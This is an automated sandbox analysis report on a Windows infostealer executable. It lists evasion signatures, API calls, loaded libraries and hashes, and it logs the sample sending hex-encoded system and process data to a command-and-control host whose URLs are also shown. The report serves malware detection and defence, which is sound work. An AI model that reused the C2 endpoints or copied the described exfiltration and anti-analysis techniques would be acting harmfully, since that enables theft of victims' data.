Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FIyDwZM4OR.exe

Overview

General Information

Sample name:FIyDwZM4OR.exe
renamed because original name is a hash value
Original sample name:81faa857e0e440955735ed78a8c61ddd.exe
Analysis ID:1581622
MD5:81faa857e0e440955735ed78a8c61ddd
SHA1:c13ce342d65ff323711b7a8829bcc3f94a3cfe56
SHA256:0db9a16d15b04d332d6f96fea01b0c31662105d3097f340ed124c7357a964072
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • FIyDwZM4OR.exe (PID: 6908 cmdline: "C:\Users\user\Desktop\FIyDwZM4OR.exe" MD5: 81FAA857E0E440955735ED78A8C61DDD)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: FIyDwZM4OR.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: FIyDwZM4OR.exeVirustotal: Detection: 59%Perma Link
Source: FIyDwZM4OR.exeReversingLabs: Detection: 65%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: FIyDwZM4OR.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: -----BEGIN PUBLIC KEY-----0_2_00EBDCF0
Source: FIyDwZM4OR.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: FIyDwZM4OR.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00E9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00E9255D
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00E929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00E929FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 561676Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 32 30 35 30 32 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 81.29.149.125 81.29.149.125
Source: Joe Sandbox ViewIP Address: 3.218.7.103 3.218.7.103
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00E97770 recv,0_2_00E97770
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 561676Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 32 30 35 30 32 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: FIyDwZM4OR.exe, 00000000.00000002.1797628720.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: FIyDwZM4OR.exe, 00000000.00000003.1776258710.00000000009C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: FIyDwZM4OR.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: FIyDwZM4OR.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: FIyDwZM4OR.exe, FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: FIyDwZM4OR.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443

System Summary

barindex
PE file contains section with special chars
Source: FIyDwZM4OR.exeStatic PE information: section name:
Source: FIyDwZM4OR.exeStatic PE information: section name: .idata
Source: FIyDwZM4OR.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C80110_3_009C8011
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C80110_3_009C8011
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C905E0_3_009C905E
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C905E0_3_009C905E
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C80110_3_009C8011
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C80110_3_009C8011
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C905E0_3_009C905E
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C905E0_3_009C905E
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C80110_3_009C8011
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C80110_3_009C8011
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C905E0_3_009C905E
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C905E0_3_009C905E
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C80110_3_009C8011
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C80110_3_009C8011
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C905E0_3_009C905E
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_3_009C905E0_3_009C905E
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00F5B1800_2_00F5B180
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00EA05B00_2_00EA05B0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00EA6FA00_2_00EA6FA0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00EA10E60_2_00EA10E6
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00F600E00_2_00F600E0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_0121A0000_2_0121A000
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_0121E0500_2_0121E050
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00EF62100_2_00EF6210
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00F5C3200_2_00F5C320
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_012035B00_2_012035B0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00F604200_2_00F60420
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_011FD4300_2_011FD430
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_011F67300_2_011F6730
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_012217A00_2_012217A0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_012147800_2_01214780
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00E9E6200_2_00E9E620
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00F5C7700_2_00F5C770
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_011E99200_2_011E9920
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00F498800_2_00F49880
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00E9A9600_2_00E9A960
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00EA49400_2_00EA4940
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00F4C9000_2_00F4C900
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_01208BF00_2_01208BF0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_01201BD00_2_01201BD0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00ED1BE00_2_00ED1BE0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_01213A700_2_01213A70
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00E9CBB00_2_00E9CBB0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_01066AC00_2_01066AC0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_01214D400_2_01214D40
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_0120CD800_2_0120CD80
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00EA5DB00_2_00EA5DB0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_0121CC900_2_0121CC90
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_011F7CC00_2_011F7CC0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00EA3ED00_2_00EA3ED0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00EB5EB00_2_00EB5EB0
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_011E2F900_2_011E2F90
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_011AAE300_2_011AAE30
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00F5EF900_2_00F5EF90
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00F58F900_2_00F58F90
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00EB4F700_2_00EB4F70
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: String function: 00E971E0 appears 42 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: String function: 00F744A0 appears 72 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: String function: 00E973F0 appears 86 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: String function: 00ED4F40 appears 174 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: String function: 00E975A0 appears 530 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: String function: 00ED4FD0 appears 183 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: String function: 0106CBC0 appears 81 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: String function: 01047220 appears 78 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: String function: 00EACCD0 appears 38 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: String function: 00E9CAA0 appears 40 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: String function: 00EACD40 appears 40 times
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: String function: 00ED50A0 appears 31 times
Source: FIyDwZM4OR.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: FIyDwZM4OR.exeStatic PE information: Section: eqinbttk ZLIB complexity 0.9943833705357142
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00E9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00E9255D
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00E931D7 CreateToolhelp32Snapshot,CloseHandle,0_2_00E931D7
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: FIyDwZM4OR.exeVirustotal: Detection: 59%
Source: FIyDwZM4OR.exeReversingLabs: Detection: 65%
Source: FIyDwZM4OR.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: FIyDwZM4OR.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSection loaded: kernel.appcore.dllJump to behavior
Source: FIyDwZM4OR.exeStatic file information: File size 4464128 > 1048576
Source: FIyDwZM4OR.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: FIyDwZM4OR.exeStatic PE information: Raw size of eqinbttk is bigger than: 0x100000 < 0x1b5800

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeUnpacked PE file: 0.2.FIyDwZM4OR.exe.e90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;eqinbttk:EW;yeuqavua:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;eqinbttk:EW;yeuqavua:EW;.taggant:EW;
